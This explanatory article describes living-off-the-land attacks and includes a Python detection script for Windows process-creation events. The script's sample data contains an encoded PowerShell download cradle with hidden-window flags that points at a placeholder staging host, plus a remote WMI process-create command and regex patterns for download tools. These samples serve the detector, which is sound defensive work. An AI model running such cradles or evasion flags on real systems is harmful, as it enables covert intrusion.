date 2025-01-21

Threat actors constantly search for new approaches as well as update older techniques to attack enterprise networks in the face of stronger cybersecurity defenses. Case in point: living-off-the-land attacks, a favorite tool of malicious hackers eager to infiltrate IT environments.

Let's examine living-off-the-land attacks, what they are and how to successfully combat them.

What are living-off-the-land attacks?

Living-off-the-land (LOTL) attacks aren't new; they have been around for as long as modern computing systems have existed. They are the digital version of homesteading or living off-grid in everyday life. To that end, LOTL attacks use legitimate tools, software and built-in OS features to gain entry. Instead of relying on more intrusive and direct malware deployments, attackers rely on fileless malware and the trusted applications already present on the victim's systems. As a result, these strategic attacks often blend in without detection.

LOTL attackers gain network access through the use of exploit kits, stolen credentials and vulnerabilities. These can be gathered from dark web marketplaces where they are sold by other attackers or initial access brokers. Attackers also conduct social engineering and phishing campaigns to trick users into providing data that enables them to gain unauthorized access to the environment.

Once inside the network, intruders launch malicious attacks by using native programs, such as Windows Management Instrumentation, CLI tools or PowerShell, to avoid being discovered. To avoid leaving traces on hard drives, attackers run malicious scripts or commands directly in memory. Additional LOTL techniques include memory-only malware and fileless ransomware deployment that bypass security defenses. The goal of these attacks is to exfiltrate data by tricking trusted tools into executing system commands. Threat actors lurk in the background while they evade detection and security defenses. By escalating privilege and access levels, LOTL attackers can inflict even more damage.
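The native-tool abuse described above (PowerShell launched with an encoded, hidden-window command, WMI used to start processes, scripts pulled straight into memory) still leaves traces in process-creation telemetry even when nothing touches the disk, which is where detection has to start. The following Python script is an added example, not code from the original article or from any vendor: it applies a few widely used heuristics to constructed events shaped like the parsed fields of a Windows Security 4688 or Sysmon Event ID 1 record. The event contents, host names, rule names and the 16-character base64 threshold are assumptions made for illustration.

```python
"""Flag process-creation events that look like living-off-the-land abuse of
built-in Windows tools (PowerShell, WMI, Office-spawned interpreters).

Added example: the events below are constructed to resemble the fields of a
Windows Security 4688 / Sysmon Event ID 1 record after parsing; they are not
telemetry from any real incident. Rule names and thresholds are assumptions.
"""
import base64
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath
from typing import Optional


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(token: str) -> Optional[str]:
    """Reverse encode_ps; returns None if the token is not a valid payload."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample events (not real telemetry). The encoded payload is a
# classic in-memory download cradle pointing at a placeholder host.
CRADLE = "(New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    {"host": "WS-101", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"host": "WS-101", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(CRADLE)},
    {"host": "SRV-DC1", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"C:\Windows\System32\wbem\WmiPrvSE.exe -Embedding"},
    {"host": "SRV-FS2", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic /node:SRV-DC1 process call create "cmd.exe /c ipconfig /all"'},
]

# PowerShell accepts unambiguous prefixes of its switches (-e, -ec, -enc ...),
# so the patterns match the abbreviations rather than only the full names.
ENCODED = re.compile(r"\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN = re.compile(r"\s-w[a-z]*\s+hidden\b", re.I)
CRADLE_RE = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|"
                       r"Invoke-RestMethod|Start-BitsTransfer|\biwr\b|\birm\b", re.I)
WMI_REMOTE = re.compile(r"\bwmic(?:\.exe)?\b.*/node:.*\bprocess\b.*\bcall\b.*\bcreate\b", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Finding:
    host: str
    image: str
    rules: list = field(default_factory=list)
    decoded: Optional[str] = None


def analyze_event(ev: dict) -> Optional[Finding]:
    """Apply the LOTL heuristics to one event; None means nothing matched."""
    cmd = ev["cmdline"]
    rules, decoded = [], None
    m = ENCODED.search(cmd)
    if m:
        rules.append("powershell_encoded_command")
        decoded = decode_ps(m.group(1))
    if HIDDEN.search(cmd):
        rules.append("powershell_hidden_window")
    # Scan the decoded script as well: the encoding is exactly what hides a
    # download cradle from a rule that only inspects the raw command line.
    if CRADLE_RE.search(cmd) or (decoded and CRADLE_RE.search(decoded)):
        rules.append("download_cradle")
    if WMI_REMOTE.search(cmd):
        rules.append("wmi_remote_process_create")
    # Parent/child context: an Office document spawning an interpreter is
    # suspicious regardless of what the command line says.
    parent = PureWindowsPath(ev["parent"]).name.lower()
    image = PureWindowsPath(ev["image"]).name.lower()
    if parent in OFFICE_PARENTS and image in INTERPRETERS:
        rules.append("office_spawned_interpreter")
    return Finding(ev["host"], image, rules, decoded) if rules else None


def analyze(events) -> list:
    """Return one Finding per event that triggered at least one rule."""
    return [f for f in map(analyze_event, events) if f]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.host}: {f.image} -> {', '.join(f.rules)}")
        if f.decoded:
            print("  decoded payload:", f.decoded)
```

Run against the constructed events, the scheduled backup script and the normal WMI provider host produce no findings, while the Word-spawned PowerShell is flagged on four rules at once and the remote WMI process creation on one. The decode step matters in practice: a rule that only looks for `DownloadString` in the raw command line never sees it inside an encoded command, and the parent-process rule catches the Office-to-interpreter chain even when the command line is entirely benign-looking.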

Examples of living-off-the-land attacks

LOTL attacks are effective because they enable malicious actors to move laterally and penetrate deeper into a system's infrastructure unnoticed. Unlike traditional malware or ransomware attacks, these intrusions are not immediately discoverable by antivirus and antimalware tools because they use native tools. Two of the most notable LOTL incidents involve NotPetya and Volt Typhoon.

NotPetya. The 2017 NotPetya attack that targeted Ukraine caused widespread damage to the country's digital infrastructure. After the malware was deployed, it encrypted critical files and took control of boot records, leaving critical systems inoperable. More than 300 Ukrainian companies were affected, among them healthcare facilities, utility companies, airports and government organizations. The attack also affected global companies such as FedEx and Merck, causing disruptions and widespread outages.

Volt Typhoon. Volt Typhoon is a Chinese nation-state-sponsored hacker group that has consistently used LOTL attacks to target U.S.-based critical infrastructure since 2021. The group typically surveils its targets' systems with native commands, examining trusted systems such as Active Directory and network configurations. Its attackers don't rely on specialized malware, as seen in some other LOTL attacks. Instead, they employ legitimate network protocols and utilities to exfiltrate sensitive information. This approach reduces the likelihood of detection.